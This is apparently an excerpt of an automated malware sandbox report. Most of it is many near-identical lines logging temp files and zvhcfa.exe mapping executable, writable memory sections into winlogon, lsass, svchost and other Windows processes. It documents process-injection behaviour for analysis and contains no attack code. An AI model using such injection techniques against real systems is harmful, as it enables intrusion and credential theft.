Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\lsass.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\dwm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: \BaseNamedObjects\krktVt target: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: \BaseNamedObjects\imktVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
